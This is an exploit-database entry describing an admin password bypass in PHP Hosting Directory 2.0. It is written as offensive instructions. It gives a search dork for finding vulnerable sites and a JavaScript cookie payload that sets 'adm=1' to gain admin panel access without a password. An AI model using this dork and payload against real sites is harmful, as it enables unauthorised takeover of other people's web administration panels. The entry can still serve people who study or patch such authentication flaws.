id: 14399
date: 10/10/2010
title: PHP Hosting Directory 2.0 Admin Password Bypass Vulnerability
author: ruiner_blackhat
cves: 

=============================================================
PHP Hosting Directory 2.0 Admin Password Bypass Vulnerability
=============================================================

# Author: [ruiner_blackhat]
# Version: [Versin 2]
# My Group Web: [www.ashiyane.org/forums]
-----------------------------------------------------------------------
Hi
With this exploit you how to bypass the admin panel will hear
php hosting versin 2
-----------------------------------------------------------------------
Initially following dork in your searches:
 
Dork: "powered by PHP Hosting Directory 2.0"
 
After selecting one of the sites compiled by the admin panel.for example:
 
site.com/admin
 
Do not write anything in the password.
Enter the code below url and press enter.
 
javascript:document.cookie = "adm=1; path=/";
 
After being loaded with the error page and check back to refresh and
enter the portal panel Admin.
-----------------------------------------------------------------------



#  0day.today [2023-03-22]  #